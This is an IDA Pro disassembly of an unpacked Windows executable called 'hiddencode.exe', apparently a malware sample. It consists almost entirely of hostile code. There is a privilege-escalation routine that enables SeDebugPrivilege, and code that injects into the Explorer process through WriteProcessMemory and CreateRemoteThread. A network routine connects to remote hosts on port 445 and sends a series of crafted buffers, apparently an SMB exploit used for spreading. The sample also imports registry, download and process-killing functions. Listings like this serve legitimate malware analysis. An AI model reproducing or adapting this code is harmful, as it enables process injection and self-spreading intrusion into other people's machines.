Assembly Code of File f4486ff5daebe50903d79f8893df1ff8/f4486ff5daebe50903d79f8893df1ff8_unpacked.asm
;
; + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
;
;
; + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
;
; Input MD5 : F4486FF5DAEBE50903D79F8893DF1FF8
; File Name : u:\startupscripts\work\hiddencode.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31000000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,
db '&c', page
endm
ifnb
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31001000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31001000 dd 77DDEAF4h ; resolved to - >ADVAPI32.RegCreateKeyExAdword_31001004 dd 77DDEBE7h ; resolved to - >ADVAPI32.RegSetValueExAdword_31001008 dd 77DD7883h ; resolved to - >ADVAPI32.RegQueryValueExAdword_3100100C dd 77DD761Bh ; resolved to - >ADVAPI32.RegOpenKeyExA ; sub_31002264 + 1D�r
dword_31001010 dd 77DDEDE5h ; resolved to - >ADVAPI32.RegDeleteValueAdword_31001014 dd 77DD6BF0h ; resolved to - >ADVAPI32.RegCloseKey ; sub_31002264 + 4E�r ...
dword_31001018 dd 77E34D78h ; resolved to - >ADVAPI32.AbortSystemShutdownAdword_3100101C dd 77DEA2F9h ; resolved to - >ADVAPI32.CryptCreateHashdword_31001020 dd 77DEA122h ; resolved to - >ADVAPI32.CryptHashDatadword_31001024 dd 77DEAB80h ; resolved to - >ADVAPI32.CryptVerifySignatureAdword_31001028 dd 77DEA254h ; resolved to - >ADVAPI32.CryptDestroyHashdword_3100102C dd 77DEA544h ; resolved to - >ADVAPI32.CryptDestroyKeydword_31001030 dd 77DE8546h ; resolved to - >ADVAPI32.CryptReleaseContextdword_31001034 dd 77DE7F96h ; resolved to - >ADVAPI32.CryptAcquireContextAdword_31001038 dd 77DEA879h ; resolved to - >ADVAPI32.CryptImportKey align 10h
dword_31001040 dd 7C80D262h ; resolved to - >KERNEL32.GetLocaleInfoAdword_31001044 dd 7C810D87h ; resolved to - >KERNEL32.WriteFiledword_31001048 dd 7C809AE4h ; resolved to - >KERNEL32.VirtualFreedword_3100104C dd 7C809A51h ; resolved to - >KERNEL32.VirtualAllocdword_31001050 dd 7C80B4CFh ; resolved to - >KERNEL32.GetModuleFileNameAdword_31001054 dd 7C80BAA1h ; resolved to - >KERNEL32.lstrcmpiAdword_31001058 dd 7C814EEAh ; resolved to - >KERNEL32.GetSystemDirectoryA ; sub_310026A6 + 37�r
dword_3100105C dd 7C834D41h ; resolved to - >KERNEL32.lstrcatA ; sub_310026A6 + 3D�r
dword_31001060 dd 7C8286EEh ; resolved to - >KERNEL32.CopyFileAdword_31001064 dd 7C86136Dh ; resolved to - >KERNEL32.WinExecdword_31001068 dd 7C864B0Fh ; resolved to - >KERNEL32.CreateToolhelp32Snapshotdword_3100106C dd 7C863DE5h ; resolved to - >KERNEL32.Process32Firstdword_31001070 dd 7C801E16h ; resolved to - >KERNEL32.TerminateProcessdword_31001074 dd 7C863F58h ; resolved to - >KERNEL32.Process32Nextdword_31001078 dd 7C80BE01h ; resolved to - >KERNEL32.lstrcpyA ; sub_31002542 + 8F�r
dword_3100107C dd 7C80BDB6h ; resolved to - >KERNEL32.lstrlenA ; sub_31001262 + 272�r ...
dword_31001080 dd 7C802442h ; resolved to - >KERNEL32.Sleep ; sub_31001ADF + E2�r ...
dword_31001084 dd 7C810111h ; resolved to - >KERNEL32.lstrcpynAdword_31001088 dd 7C80DDF5h ; resolved to - >KERNEL32.GetCurrentProcessdword_3100108C dd 7C80ADA0h ; resolved to - >KERNEL32.GetProcAddress ; sub_31001851 + 2C�r
dword_31001090 dd 7C801D77h ; resolved to - >KERNEL32.LoadLibraryA ; sub_31001E06 + A4�r
dword_31001094 dd 7C80220Fh ; resolved to - >KERNEL32.WriteProcessMemorydword_31001098 dd 7C809B47h ; resolved to - >KERNEL32.CloseHandle ; sub_310019B3 + 19�r ...
dword_3100109C dd 7C8309E1h ; resolved to - >KERNEL32.OpenProcess ; sub_31002310 + 92�r
dword_310010A0 dd 7C80B6A1h ; resolved to - >KERNEL32.GetModuleHandleA ; UPX0:31001D8A�r
dword_310010A4 dd 7C80929Ch ; resolved to - >KERNEL32.GetTickCountdword_310010A8 dd 7C80E93Fh ; resolved to - >KERNEL32.CreateMutexAdword_310010AC dd 7C810637h ; resolved to - >KERNEL32.CreateThread ; sub_310019B3 + 12�r
dword_310010B0 dd 7C802367h ; resolved to - >KERNEL32.CreateProcessAdword_310010B4 dd 7C80A017h ; resolved to - >KERNEL32.SetEventdword_310010B8 dd 7C81320Ch ; resolved to - >KERNEL32.OpenEventAdword_310010BC dd 7C80C058h ; resolved to - >KERNEL32.ExitThread ; sub_31001C18 + 66�r ...
dword_310010C0 dd 7C80180Eh ; resolved to - >KERNEL32.ReadFiledword_310010C4 dd 7C810A77h ; resolved to - >KERNEL32.GetFileSizedword_310010C8 dd 7C801A24h ; resolved to - >KERNEL32.CreateFileA ; sub_310026A6 + 8F�r
dword_310010CC dd 7C81CDDAh ; resolved to - >KERNEL32.ExitProcess ; sub_31002476 + C3�r
dword_310010D0 dd 7C910331h ; resolved to - >NTDLL.RtlGetLastWin32Errordword_310010D4 dd 7C831EABh ; resolved to - >KERNEL32.DeleteFileA ; sub_31002476 + F�r
dword_310010D8 dd 7C802520h ; resolved to - >KERNEL32.WaitForSingleObjectdword_310010DC dd 7C8308ADh ; resolved to - >KERNEL32.CreateEventAdword_310010E0 dd 7C809766h ; resolved to - >KERNEL32.InterlockedIncrement ; sub_3100202D + 58�r
align 8
dword_310010E8 dd 77C46EB0h ; resolved to - >MSVCRT.memcmpdword_310010EC dd 77C47660h ; resolved to - >MSVCRT.strchr ; sub_31002928 + 68�r
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_310010F0: ; DATA XREF: UPX0:loc_31002BD0�r
xchg eax, esp
pop esp
retn
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
db 77h
dword_310010F4 dd 77C47C60h ; resolved to - >MSVCRT.strstr ; sub_31002310 + 79�r ...
dword_310010F8 dd 77C371D3h ; resolved to - >MSVCRT.rand ; sub_31001AC9 + 1�r ...
dword_310010FC dd 77C371BCh ; resolved to - >MSVCRT.sranddword_31001100 dd 77C46F70h ; resolved to - >MSVCRT.memcpydword_31001104 dd 77C478A0h ; resolved to - >MSVCRT.strlendword_31001108 dd 77C475F0h ; resolved to - >MSVCRT.memset align 10h
dword_31001110 dd 7E42DE87h ; resolved to - >USER32.FindWindowAdword_31001114 dd 7E41BE4Bh ; resolved to - >USER32.GetForegroundWindowdword_31001118 dd 7E418A80h ; resolved to - >USER32.GetWindowThreadProcessIddword_3100111C dd 7E41A8ADh ; resolved to - >USER32.wsprintfA ; sub_31001ADF + 8B�r ...
dd 0
dword_31001124 dd 42C2ABF4h ; resolved to - >WININET.InternetReadFile ; sub_31002A44 + B3�r
dword_31001128 dd 42C30BFAh ; resolved to - >WININET.InternetOpenUrlA ; sub_31002A44 + 9E�r
dword_3100112C dd 42C2C8A1h ; resolved to - >WININET.InternetOpenA ; sub_31002A44 + 89�r
dword_31001130 dd 42C1DAC1h ; resolved to - >WININET.InternetCloseHandledword_31001134 dd 42C367F6h ; resolved to - >WININET.InternetGetConnectedState ; UPX0:31002184�r
dd 0
dword_3100113C dd 71AB664Dh ; resolved to - >WS2_32.WSAStartupdword_31001140 dd 71AB3E00h ; resolved to - >WS2_32.binddword_31001144 dd 71AB88D3h ; resolved to - >WS2_32.listendword_31001148 dd 71AC1028h ; resolved to - >WS2_32.acceptdword_3100114C dd 71AB50C8h ; resolved to - >WS2_32.gethostnamedword_31001150 dd 71AB94DCh ; resolved to - >WS2_32.WSAGetLastErrordword_31001154 dd 71AB4FD4h ; resolved to - >WS2_32.gethostbynamedword_31001158 dd 71AB3B91h ; resolved to - >WS2_32.socket ; sub_31001C18 + AC�r
dword_3100115C dd 71AB3F41h ; resolved to - >WS2_32.inet_ntoa ; sub_310020F4 + D�r
dword_31001160 dd 71AB2B66h ; resolved to - >WS2_32.ntohs ; sub_31001C18 + F0�r
dword_31001164 dd 71AB406Ah ; resolved to - >WS2_32.connectdword_31001168 dd 71AB428Ah ; resolved to - >WS2_32.send ; sub_31001ADF + 67�r ...
dword_3100116C dd 71AB615Ah ; resolved to - >WS2_32.recv ; sub_31001262 + 1D8�r ...
dword_31001170 dd 71AC0BDEh ; resolved to - >WS2_32.shutdown ; sub_31001ADF + 11B�r
dword_31001174 dd 71AB9639h ; resolved to - >WS2_32.closesocket ; sub_31001ADF + 122�r
align 10h
dword_31001180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
########################## SUBROUTINE ##########################
sub_31001190 proc near ; CODE XREF: sub_31002928 + BF�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [ esp + 4 + arg_0 ]
push esi
mov esi, dword_31001034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_310011BD
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_310011BD
push 1
pop eax
jmp short loc_310011DB
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_310011BD: ; CODE XREF: sub_31001190 + 19�j
; sub_31001190 + 26�j
lea eax, [ ebx + 4 ]
push eax
push edi
push edi
push [ esp + 18h + arg_8 ]
push [ esp + 1Ch + arg_4 ]
push dword ptr [ ebx ]
call dword_31001038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_310011DB: ; CODE XREF: sub_31001190 + 2B�j
pop edi
pop esi
pop ebx
retn
sub_31001190 endp
########################## SUBROUTINE ##########################
sub_310011DF proc near ; CODE XREF: sub_31002928 + 10F�p
arg_0 = dword ptr 4
push esi
mov esi, [ esp + 4 + arg_0 ]
push dword ptr [ esi + 4 ]
call dword_3100102C ; CryptDestroyKey
push 0
push dword ptr [ esi ]
call dword_31001030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_310011DF endp
########################## SUBROUTINE ##########################
sub_310011FB proc near ; CODE XREF: sub_31002928 + EA�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ ebp + arg_0 ]
push edi
lea eax, [ ebp + arg_0 ]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [ esi ]
call dword_3100101C ; CryptCreateHash
test eax, eax
jnz short loc_31001221
push 1
pop eax
jmp short loc_3100125E
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_31001221: ; CODE XREF: sub_310011FB + 1F�j
push edi
push [ ebp + arg_8 ]
push [ ebp + arg_4 ]
push [ ebp + arg_0 ]
call dword_31001020 ; CryptHashData
test eax, eax
jnz short loc_3100123A
push 2
pop edi
jmp short loc_31001253
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_3100123A: ; CODE XREF: sub_310011FB + 38�j
push edi
push edi
push dword ptr [ esi + 4 ]
push [ ebp + arg_10 ]
push [ ebp + arg_C ]
push [ ebp + arg_0 ]
call dword_31001024 ; CryptVerifySignatureA
mov ecx, [ ebp + arg_14 ]
mov [ ecx ], eax
loc_31001253: ; CODE XREF: sub_310011FB + 3D�j
push [ ebp + arg_0 ]
call dword_31001028 ; CryptDestroyHash
mov eax, edi
loc_3100125E: ; CODE XREF: sub_310011FB + 24�j
pop edi
pop esi
pop ebp
retn
sub_310011FB endp
########################## SUBROUTINE ##########################
sub_31001262 proc near ; CODE XREF: sub_31001F41 + 36�p
; sub_31001FA5 + 48�p ...
var_89E4 = byte ptr - 89E4h
var_897C = byte ptr - 897Ch
var_690C = byte ptr - 690Ch
var_689C = byte ptr - 689Ch
var_5DD8 = byte ptr - 5DD8h
var_4834 = byte ptr - 4834h
var_4833 = byte ptr - 4833h
var_37A0 = byte ptr - 37A0h
var_2CDC = byte ptr - 2CDCh
var_2CDB = byte ptr - 2CDBh
var_2CD8 = byte ptr - 2CD8h
var_24F4 = byte ptr - 24F4h
var_24E4 = byte ptr - 24E4h
var_21C0 = byte ptr - 21C0h
var_21BC = byte ptr - 21BCh
var_21B0 = byte ptr - 21B0h
var_1F28 = byte ptr - 1F28h
var_1EAC = byte ptr - 1EACh
var_16DC = byte ptr - 16DCh
var_1231 = byte ptr - 1231h
var_F44 = byte ptr - 0F44h
var_EA4 = byte ptr - 0EA4h
var_798 = dword ptr - 798h
var_788 = byte ptr - 788h
var_774 = byte ptr - 774h
var_730 = byte ptr - 730h
var_134 = byte ptr - 134h
var_133 = byte ptr - 133h
var_E4 = byte ptr - 0E4h
var_E1 = byte ptr - 0E1h
var_B7 = byte ptr - 0B7h
var_B5 = byte ptr - 0B5h
var_B4 = byte ptr - 0B4h
var_6C = byte ptr - 6Ch
var_4C = byte ptr - 4Ch
var_24 = word ptr - 24h
var_22 = word ptr - 22h
var_20 = dword ptr - 20h
var_14 = dword ptr - 14h
var_10 = dword ptr - 10h
var_C = dword ptr - 0Ch
var_6 = byte ptr - 6
var_5 = byte ptr - 5
var_4 = dword ptr - 4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31002BA0
mov eax, dword_310049CC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ ebp + var_14 ], eax
mov eax, dword_310049D0
push ebx
push edi
push 2
mov [ ebp + var_10 ], eax
mov [ ebp + var_C ], edi
call dword_31001158 ; socket
cmp eax, 0FFFFFFFFh
mov [ ebp + var_4 ], eax
jz loc_310017C2
push esi
mov esi, [ ebp + arg_0 ]
push 1Dh
push esi
call dword_3100115C ; inet_ntoa
push eax
lea eax, [ ebp + var_6C ]
push eax
call dword_31001084 ; lstrcpynA
lea eax, [ ebp + var_6C ]
push eax
lea eax, [ ebp + var_4C ]
push offset loc_310049C0
push eax
call dword_3100111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ ebp + var_133 ]
loc_310012D5: ; CODE XREF: sub_31001262 + 83�j
mov dl, [ ebp + ecx + var_4C ]
mov [ eax - 1 ], dl
and byte ptr [ eax ], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_310012D5
push 60h
lea eax, [ ebp + var_E4 ]
push offset dword_310044E0
push eax
call sub_31002B98 ; memcpy
lea eax, [ ebp + var_4C ]
push eax
call sub_31002B92 ; strlen
shl eax, 1
push eax
lea eax, [ ebp + var_134 ]
push eax
lea eax, [ ebp + var_B4 ]
push eax
call sub_31002B98 ; memcpy
add esp, 1Ch
lea eax, [ ebp + var_4C ]
push 9
push (offset aC + 3)
push eax
call sub_31002B92 ; strlen
pop ecx
lea eax, [ ebp + eax * 2 + var_B5 ]
push eax
call sub_31002B98 ; memcpy
lea eax, [ ebp + var_4C ]
push eax
call sub_31002B92 ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ ebp + var_5 ], al
lea eax, [ ebp + var_5 ]
push eax
lea eax, [ ebp + var_E1 ]
push eax
call sub_31002B98 ; memcpy
lea eax, [ ebp + var_4C ]
push eax
call sub_31002B92 ; strlen
shl al, 1
add al, 9
push edi
mov [ ebp + var_6 ], al
lea eax, [ ebp + var_6 ]
push eax
lea eax, [ ebp + var_B7 ]
push eax
call sub_31002B98 ; memcpy
push 0E29h
lea eax, [ ebp + var_1F28 ]
push 31h
push eax
call sub_31002B8C ; memset
push 10h
lea eax, [ ebp + var_24 ]
push ebx
push eax
call sub_31002B8C ; memset
add esp, 44h
mov [ ebp + var_24 ], 2
push 1BDh
call dword_31001160 ; ntohs
mov [ ebp + var_22 ], ax
lea eax, [ ebp + var_24 ]
push 10h
push eax
push [ ebp + var_4 ]
mov [ ebp + var_20 ], esi
call dword_31001164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_310017B8
mov esi, dword_31001080
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_31001168
push 89h
push offset dword_310042C8
push [ ebp + var_4 ]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ ebp + var_774 ]
push 640h
push eax
push [ ebp + var_4 ]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0A8h
push offset dword_31004354
push [ ebp + var_4 ]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ ebp + var_774 ]
push 640h
push eax
push [ ebp + var_4 ]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0DEh
push offset dword_31004400
push [ ebp + var_4 ]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ ebp + var_774 ]
push 640h
push eax
push [ ebp + var_4 ]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
cmp eax, 46h
jl loc_310017AD
cmp [ ebp + var_730 ], 31h
jnz loc_31001658
and [ ebp + arg_0 ], 0
push 7D0h
lea eax, [ ebp + var_F44 ]
push 90h
push eax
call sub_31002B8C ; memset
add esp, 0Ch
push offset byte_31004000
call dword_3100107C ; lstrlenA
push eax
lea eax, [ ebp + var_EA4 ]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
add esp, 0Ch
lea eax, [ ebp + var_14 ]
push eax
call dword_3100107C ; lstrlenA
push eax
lea eax, [ ebp + var_14 ]
push eax
lea eax, [ ebp + var_788 ]
push eax
call sub_31002B98 ; memcpy
mov eax, dword_31004906
add esp, 0Ch
mov [ ebp + var_798 ], eax
loc_310014F9: ; CODE XREF: sub_31001262 + 4E1�j
movsx eax, [ ebp + var_5 ]
add eax, 4
push 0
push eax
lea eax, [ ebp + var_E4 ]
push eax
push [ ebp + var_4 ]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ ebp + var_774 ]
push 640h
push eax
push [ ebp + var_4 ]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 68h
push offset dword_31004544
push [ ebp + var_4 ]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ ebp + var_774 ]
push 640h
push eax
push [ ebp + var_4 ]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0A0h
push offset dword_310045B0
push [ ebp + var_4 ]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ ebp + var_774 ]
push 640h
push eax
push [ ebp + var_4 ]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
cmp [ ebp + arg_0 ], 0
jz loc_31001748
push 68h
lea eax, [ ebp + var_89E4 ]
push offset dword_31004768
push eax
call sub_31002B98 ; memcpy
lea eax, [ ebp + var_4834 ]
push 1B5Ah
push eax
lea eax, [ ebp + var_897C ]
push eax
call sub_31002B98 ; memcpy
push 70h
lea eax, [ ebp + var_690C ]
push offset dword_310047D4
push eax
call sub_31002B98 ; memcpy
lea eax, [ ebp + var_37A0 ]
push 0A5Eh
push eax
lea eax, [ ebp + var_689C ]
push eax
call sub_31002B98 ; memcpy
push 84h
lea eax, [ ebp + var_5DD8 ]
push offset dword_31004848
push eax
call sub_31002B98 ; memcpy
add esp, 3Ch
lea eax, [ ebp + var_89E4 ]
push 0
push 10FCh
push eax
push [ ebp + var_4 ]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ ebp + var_774 ]
push 640h
push eax
push [ ebp + var_4 ]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0FDCh
lea eax, [ ebp + var_690C ]
jmp loc_310017A0
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_31001658: ; CODE XREF: sub_31001262 + 22B�j
push 0DACh
lea eax, [ ebp + var_2CD8 ]
push 90h
push eax
mov [ ebp + arg_0 ], 1
call sub_31002B8C ; memset
push 4
lea eax, [ ebp + var_24F4 ]
push offset dword_31004940
push eax
call sub_31002B98 ; memcpy
push offset byte_31004000
call sub_31002B92 ; strlen
push eax
lea eax, [ ebp + var_24E4 ]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
push 4
lea eax, [ ebp + var_21C0 ]
push offset loc_310049B8
push eax
call sub_31002B98 ; memcpy
push 4
lea eax, [ ebp + var_21BC ]
push offset dword_31004940
push eax
call sub_31002B98 ; memcpy
add esp, 40h
push offset byte_31004000
call sub_31002B92 ; strlen
push eax
lea eax, [ ebp + var_21B0 ]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ ebp + var_4833 ]
loc_310016F4: ; CODE XREF: sub_31001262 + 4A8�j
mov dl, [ ebp + ecx + var_2CD8 ]
mov [ eax - 1 ], dl
and byte ptr [ eax ], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_310016F4
and [ ebp + var_2CDC ], 0
and [ ebp + var_2CDB ], 0
push 1C52h
lea eax, [ ebp + var_89E4 ]
push 31h
push eax
call sub_31002B8C ; memset
push 1C52h
lea eax, [ ebp + var_690C ]
push 31h
push eax
call sub_31002B8C ; memset
add esp, 18h
jmp loc_310014F9
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_31001748: ; CODE XREF: sub_31001262 + 339�j
push 7Ch
lea eax, [ ebp + var_1F28 ]
push offset dword_31004654
push eax
call sub_31002B98 ; memcpy
lea eax, [ ebp + var_F44 ]
push 7D0h
push eax
lea eax, [ ebp + var_1EAC ]
push eax
call sub_31002B98 ; memcpy
push 90h
lea eax, [ ebp + var_16DC ]
push offset dword_310046D4
push eax
call sub_31002B98 ; memcpy
add esp, 24h
and [ ebp + var_1231 ], 0
lea eax, [ ebp + var_1F28 ]
push 0
push 0CF8h
loc_310017A0: ; CODE XREF: sub_31001262 + 3F1�j
push eax
push [ ebp + var_4 ]
call ebx ; send
push edi
call esi ; Sleep
and [ ebp + var_C ], 0
loc_310017AD: ; CODE XREF: sub_31001262 + 1AD�j
; sub_31001262 + 1E1�j ...
push 2
push [ ebp + var_4 ]
call dword_31001170 ; shutdown
loc_310017B8: ; CODE XREF: sub_31001262 + 166�j
push [ ebp + var_4 ]
call dword_31001174 ; closesocket
pop esi
loc_310017C2: ; CODE XREF: sub_31001262 + 37�j
mov eax, [ ebp + var_C ]
pop edi
pop ebx
leave
retn
sub_31001262 endp
########################## SUBROUTINE ##########################
sub_310017C9 proc near ; CODE XREF: UPX0:loc_31001DCA�p
var_1C = dword ptr - 1Ch
var_18 = byte ptr - 18h
var_10 = dword ptr - 10h
var_C = dword ptr - 0Ch
var_8 = dword ptr - 8
var_4 = dword ptr - 4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; \"advapi32\"
call dword_31001090 ; LoadLibraryA
mov esi, dword_3100108C
mov edi, eax
push offset aOpenprocesstok ; \"OpenProcessToken\"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ ebp + var_4 ], eax
jz short loc_3100184D
push offset aLookupprivileg ; \"LookupPrivilegeValueA\"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ ebp + var_8 ], eax
jz short loc_3100184D
push offset aAdjusttokenpri ; \"AdjustTokenPrivileges\"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_3100184D
lea eax, [ ebp + var_C ]
push eax
push 20h
call dword_31001088 ; GetCurrentProcess
push eax
call + var_4 ]>[ ebp + var_4 ]
lea eax, [ ebp + var_18 ]
mov [ ebp + var_1C ], 1
push eax
push offset aSedebugprivile ; \"SeDebugPrivilege\"
push 0
mov [ ebp + var_10 ], 2
call + var_8 ]>[ ebp + var_8 ]
push 0
push 0
lea eax, [ ebp + var_1C ]
push 10h
push eax
push 0
push [ ebp + var_C ]
call esi ; GetProcAddress
loc_3100184D: ; CODE XREF: sub_310017C9 + 28�j
; sub_310017C9 + 37�j ...
pop edi
pop esi
leave
retn
sub_310017C9 endp
########################## SUBROUTINE ##########################
sub_31001851 proc near ; CODE XREF: UPX0:31001DDE�p
var_18 = byte ptr - 18h
var_14 = dword ptr - 14h
var_10 = dword ptr - 10h
var_C = dword ptr - 0Ch
var_8 = dword ptr - 8
var_4 = dword ptr - 4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31004FD0
and [ ebp + var_4 ], 0
push ebx
push esi
mov eax, [ ecx + 3Ch ]
push edi
add eax, ecx
push offset aKernel32 ; \"kernel32\"
mov ecx, [ eax + 34h ]
mov edi, [ eax + 50h ]
mov [ ebp + var_C ], ecx
call dword_310010A0 ; GetModuleHandleA
mov esi, dword_3100108C
mov ebx, eax
push offset aVirtualallocex ; \"VirtualAllocEx\"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ ebp + var_10 ], eax
jnz short loc_31001898
loc_31001894: ; CODE XREF: sub_31001851 + 54�j
push 1
jmp short loc_310018E9
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_31001898: ; CODE XREF: sub_31001851 + 41�j
push offset aCreateremoteth ; \"CreateRemoteThread\"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ ebp + var_14 ], eax
jz short loc_31001894
push 0
push offset aShell_traywnd ; \"Shell_TrayWnd\"
call dword_31001110 ; FindWindowA
test eax, eax
jnz short loc_310018C6
call dword_31001114 ; GetForegroundWindow
test eax, eax
jnz short loc_310018C6
push 2
jmp short loc_310018E9
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_310018C6: ; CODE XREF: sub_31001851 + 65�j
; sub_31001851 + 6F�j
lea ecx, [ ebp + var_8 ]
push ecx
push eax
call dword_31001118 ; GetWindowThreadProcessId
push [ ebp + var_8 ]
push 0
push 42Ah
call dword_3100109C ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_310018EC
push 3
loc_310018E9: ; CODE XREF: sub_31001851 + 45�j
; sub_31001851 + 73�j
pop eax
jmp short loc_31001957
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_310018EC: ; CODE XREF: sub_31001851 + 94�j
push 4
push 3000h
push edi
push [ ebp + var_C ]
push ebx
call + var_10 ]>[ ebp + var_10 ]
mov esi, dword_31001098
test eax, eax
jz short loc_3100194A
lea ecx, [ ebp + var_10 ]
push ecx
push edi
push eax
push eax
push ebx
call dword_31001094 ; WriteProcessMemory
push dword_31004FC4
call esi ; CloseHandle
lea eax, [ ebp + var_18 ]
xor edi, edi
push eax
push edi
push 1
push [ ebp + arg_0 ]
push edi
push edi
push ebx
call + var_14 ]>[ ebp + var_14 ]
cmp eax, edi
jz short loc_31001936
push eax
call esi ; CloseHandle
jmp short loc_31001951
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_31001936: ; CODE XREF: sub_31001851 + DE�j
push offset aUterm13 ; \"uterm13\"
call sub_3100198A
pop ecx
mov [ ebp + var_4 ], 5
jmp short loc_31001951
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
loc_3100194A: ; CODE XREF: sub_31001851 + B2�j
mov [ ebp + var_4 ], 4
loc_31001951: ; CODE XREF: sub_31001851 + E3�j
; sub_31001851 + F7�j
push ebx
call esi ; CloseHandle
mov eax, [ ebp + var_4 ]
loc_31001957: ; CODE XREF: sub_31001851 + 99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31001851 endp
